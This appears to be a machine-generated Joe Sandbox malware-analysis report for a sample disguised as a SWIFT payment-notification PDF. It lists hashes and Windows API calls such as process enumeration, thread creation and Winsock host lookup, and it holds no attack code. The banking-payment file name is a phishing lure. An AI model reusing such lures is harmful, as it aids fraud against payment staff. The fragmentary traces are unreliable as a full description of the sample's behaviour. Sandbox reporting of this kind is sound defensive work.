                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$Enable$Show$MessageMoveSend
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 896007046-0
                                                                                                                              • Opcode ID: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                                                                                              • Instruction ID: 578be1c3660e2fd518c7beccd973f741d6ce186f3db94e5441c29ef1e5fc56da
                                                                                                                              • Opcode Fuzzy Hash: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                                                                                              • Instruction Fuzzy Hash: 5F419D742003809FF724DB24C894BAB77E0FF96305F18446EF5859B291DB78A845CB59
                                                                                                                              APIs
                                                                                                                              • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
                                                                                                                              • SendMessageW.USER32(03311BA8,000000F1,00000000,00000000), ref: 00440E6E
                                                                                                                              • SendMessageW.USER32(03311BA8,000000F1,00000001,00000000), ref: 00440E9A
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$LongWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 312131281-0
                                                                                                                              • Opcode ID: 8e011b54ce9cde448a93fe9bb8036a6d541319eb6c66cabd8f3e8fc2f85cf438
                                                                                                                              • Instruction ID: 2c169baf4234265a3f6c05f50e500cf46f5ce099e15a3d3a23704bf731ec4cbe
                                                                                                                              • Opcode Fuzzy Hash: 8e011b54ce9cde448a93fe9bb8036a6d541319eb6c66cabd8f3e8fc2f85cf438
                                                                                                                              • Instruction Fuzzy Hash: 944189342402119FE720CF58DDC4F2A77A1FF9A710F6049A9E2119B3A1CB74ACA2CB58
                                                                                                                              APIs
                                                                                                                              • EnumProcesses.PSAPI(?,00000800,?,?,00443D49,?,?,?,004A8178), ref: 00433DBB
                                                                                                                              • OpenProcess.KERNEL32(00000410,00000000,?,?,?,004A8178), ref: 00433E19
                                                                                                                              • EnumProcessModules.PSAPI(00000000,?,00000004,?), ref: 00433E2C
                                                                                                                              • GetModuleBaseNameW.PSAPI(00000000,?,?,00000104), ref: 00433E43
                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00433EC8
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: EnumProcess$BaseCloseHandleModuleModulesNameOpenProcesses
                                                                                                                              • String ID: I=D
                                                                                                                              • API String ID: 2155911829-2605949546
                                                                                                                              • Opcode ID: e2a61d30099513a4b86aa9445ff639564bac9cad2a304c62a227ff9d1443cd16
                                                                                                                              • Instruction ID: 36098e5712afd53b5e3c4de91d69c0015cf2cbbc5c01d2287a97767e02e0faf1
                                                                                                                              • Opcode Fuzzy Hash: e2a61d30099513a4b86aa9445ff639564bac9cad2a304c62a227ff9d1443cd16
                                                                                                                              • Instruction Fuzzy Hash: 05319376600108AFDB11CFA4CD85EEF73B9AF8C701F10419AFA0987250DB75AB85CBA4
                                                                                                                              APIs
                                                                                                                              • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448AC9
                                                                                                                              • GetFocus.USER32 ref: 00448ACF
                                                                                                                              • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                                                                              • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                                                                              • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                                                                              • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                                                                              • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$Enable$Show$FocusMessageSend
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3429747543-0
                                                                                                                              • Opcode ID: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                                                                                              • Instruction ID: 6f3afe48a64986b2df7f4b22be5166ca64fe0b5af1f2aee4406df3dc20f3ce1d
                                                                                                                              • Opcode Fuzzy Hash: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                                                                                              • Instruction Fuzzy Hash: F331C4706043805BF7248F24CCC8BAFB7D4FB95305F08491EF581A6291DBBCA845CB59
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                                                                                              • KillTimer.USER32(?,?,?,?,?), ref: 004012D3
                                                                                                                              • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012E2
                                                                                                                              • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
                                                                                                                              • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
                                                                                                                              • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: IconNotifyShell_$Timer$Kill
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3970887597-0
                                                                                                                              • Opcode ID: 98bdb4639f13a2aff9c284aaa5c14a4e0db979becac89074174bb9299657736d
                                                                                                                              • Instruction ID: ad6fff92b80ef16b1053521cf30c66606da497e43c90b6e238f917110e524b22
                                                                                                                              • Opcode Fuzzy Hash: 98bdb4639f13a2aff9c284aaa5c14a4e0db979becac89074174bb9299657736d
                                                                                                                              • Instruction Fuzzy Hash: AF31EA70604259BFDB16CB24DC55BEAFBBCBB02304F0000EAF58CA3291C7741A95CB9A
                                                                                                                              APIs
                                                                                                                              • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450BE7
                                                                                                                              • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450BF8
                                                                                                                              • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450C06
                                                                                                                              • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450C17
                                                                                                                              • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450C25
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend
                                                                                                                              • String ID: Msctls_Progress32
                                                                                                                              • API String ID: 3850602802-3636473452
                                                                                                                              • Opcode ID: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                                                                                              • Instruction ID: 3e9a69ee1b5e3cb2ffa50bc712587bba9ef5757239c838e11c91c46d95a842ac
                                                                                                                              • Opcode Fuzzy Hash: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                                                                                              • Instruction Fuzzy Hash: 7A21667135030477EB20DEA9DC82F97B3AD9F94B24F21460AFB54A72D1C5B5F8418B58
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Destroy$DeleteImageList_ObjectWindow$Icon
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3985565216-0
                                                                                                                              • Opcode ID: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                                                                                                              • Instruction ID: 510e71718d61fb01ae158a6e5fa7ad280301b7661e5b3aef53c80a3471921dd4
                                                                                                                              • Opcode Fuzzy Hash: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                                                                                                              • Instruction Fuzzy Hash: 70217E70200A00EFCB20DF25D9D4A2A77AABF48712F10896DE906CB356D739EC45CB69
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
                                                                                                                                • Part of subcall function 00436B19: HeapAlloc.KERNEL32(00000000), ref: 00436B24
                                                                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
                                                                                                                              • GetCurrentProcess.KERNEL32(?,00000000), ref: 00436C91
                                                                                                                              • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
                                                                                                                              • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00436CA6
                                                                                                                              • GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00436CAF
                                                                                                                              • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00436CB2
                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00036C2B,00000000,00000000,00000000), ref: 00436CCA
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1957940570-0
                                                                                                                              • Opcode ID: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                                                                                              • Instruction ID: 99b39fe8e7f3ac854e5c8e3994335d5d6f6ef2f737fc2b72a46a077924210789
                                                                                                                              • Opcode Fuzzy Hash: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                                                                                              • Instruction Fuzzy Hash: A301E6753403047BD620EB65DC96F5B775CEB89B50F114819FA04DB1D1C6B5E8008B78
                                                                                                                              APIs
                                                                                                                              • WSAStartup.WSOCK32(00000101,?), ref: 00465559
                                                                                                                                • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                                                                                              • inet_addr.WSOCK32(?,00000000,?,?), ref: 0046559B
                                                                                                                              • gethostbyname.WSOCK32(?), ref: 004655A6
                                                                                                                              • GlobalAlloc.KERNEL32(00000040,00000040), ref: 0046561C
                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 0046575C
                                                                                                                              • WSACleanup.WSOCK32 ref: 00465762
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Global$AllocByteCharCleanupFreeMultiStartupWidegethostbynameinet_addr
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 867222529-0
                                                                                                                              • Opcode ID: 861621b3bc9d23e299d0c06e3d54db9a70791c433b129c8d2c46b05cd3269fa8
                                                                                                                              • Instruction ID: 472bd1bc5547e678c188051989a3a6c7a671c7751f2ff3ad056c489052ad9926
                                                                                                                              • Opcode Fuzzy Hash: 861621b3bc9d23e299d0c06e3d54db9a70791c433b129c8d2c46b05cd3269fa8
                                                                                                                              • Instruction Fuzzy Hash: CAA19E72604300AFD310EF65C981F5FB7E8AF88704F544A1EF64597291E778E905CB9A
                                                                                                                              APIs
                                                                                                                              • GetClientRect.USER32(?,?), ref: 004302E6
                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 00430316
                                                                                                                              • GetClientRect.USER32(?,?), ref: 00430364
                                                                                                                              • GetSystemMetrics.USER32(0000000F), ref: 004303B1
                                                                                                                              • GetWindowRect.USER32(?,?), ref: 004303C3
                                                                                                                              • ScreenToClient.USER32(?,?), ref: 004303EC
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Rect$Client$Window$MetricsScreenSystem
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3220332590-0
                                                                                                                              • Opcode ID: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                                                                                              • Instruction ID: e4235e81f7515d2978e088f6fadb01cec8eb5fe04dcc4a3bbd5a83ea815e8f28
                                                                                                                              • Opcode Fuzzy Hash: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                                                                                              • Instruction Fuzzy Hash: 13A14875A0070A9BCB10CFA8C594BEFB7B1FF58314F00961AE9A9E7350E734AA44CB54
                                                                                                                              APIs
                                                                                                                              • GetCPInfo.KERNEL32(00000000,00000000,00000000,7FFFFFFF,00000000), ref: 00425153
                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000009,?,00000000,00000000,00000000), ref: 004251D9
                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,?,00000000,00000000,00000000), ref: 0042524C
                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000009,00425333,00000000,00000000,00000000), ref: 00425265
                                                                                                                                • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00425333,00000000,00000000,00000000), ref: 004252C1
                                                                                                                              • CompareStringW.KERNEL32(?,?,00000000,?,00000000,00000000), ref: 004252D5
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ByteCharMultiWide$AllocateCompareHeapInfoString
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1019172818-0
                                                                                                                              • Opcode ID: a97e87a0cf8e327970f42a8fe21626367e887f7120d8d0fd46045620408d1da2
                                                                                                                              • Instruction ID: 14196df02b160664b9a6e4d163639003d0329da294e125f629acad21a16e56a1
                                                                                                                              • Opcode Fuzzy Hash: a97e87a0cf8e327970f42a8fe21626367e887f7120d8d0fd46045620408d1da2
                                                                                                                              • Instruction Fuzzy Hash: 2281D231F00A26AFDF218E64EC51BBF7BA29F45320F94015BE810E62D1D7798C61CB69
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                                                                              • GetMenu.USER32 ref: 0047A703
                                                                                                                              • GetMenuItemCount.USER32(00000000), ref: 0047A74F
                                                                                                                              • GetMenuStringW.USER32(00000000,?,?,00007FFF,00000400), ref: 0047A783
                                                                                                                              • GetMenuItemID.USER32(00000000,?), ref: 0047A7E0
                                                                                                                              • GetSubMenu.USER32(00000000,?), ref: 0047A7F2
                                                                                                                              • PostMessageW.USER32(?,00000111,?,00000000), ref: 0047A884
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Menu$Item$CountMessagePostStringWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3481743490-0
                                                                                                                              • Opcode ID: 16bc5092e07a895739fe4917524b2b0408d510081aeddcc8af370e4710e2e95b
                                                                                                                              • Instruction ID: 02f8ada5611b6a2978ded3aa89f74167ce8c021908d800e5e23178b580333db3
                                                                                                                              • Opcode Fuzzy Hash: 16bc5092e07a895739fe4917524b2b0408d510081aeddcc8af370e4710e2e95b
                                                                                                                              • Instruction Fuzzy Hash: AA51FA71504301ABD310EF25DC81B9FB7E8FF88314F108A2EF989A7241D779E95487A6
                                                                                                                              APIs
                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,7FFFFFFF,00000100,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,7FFFFFFF,00000001,00000000,7FFFFFFF), ref: 0041C69C
                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0041C70A
                                                                                                                              • LCMapStringW.KERNEL32(?,?,?,00000000,00000000,00000000), ref: 0041C726
                                                                                                                              • LCMapStringW.KERNEL32(?,?,?,00000000,?,?), ref: 0041C75F
                                                                                                                              • LCMapStringW.KERNEL32(?,?,?,?,00000000,?), ref: 0041C7C5
                                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041C7E4
                                                                                                                                • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ByteCharMultiStringWide$AllocateHeap
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1400492145-0
                                                                                                                              • Opcode ID: 121c2e71a63d83f202090fb515f4f119a3fa74be0ae2761aea1c77af5e92b77f
                                                                                                                              • Instruction ID: c47f3d818bad9736da72325d1ab4489a7f384eb940dec42a4d47e01db447a74c
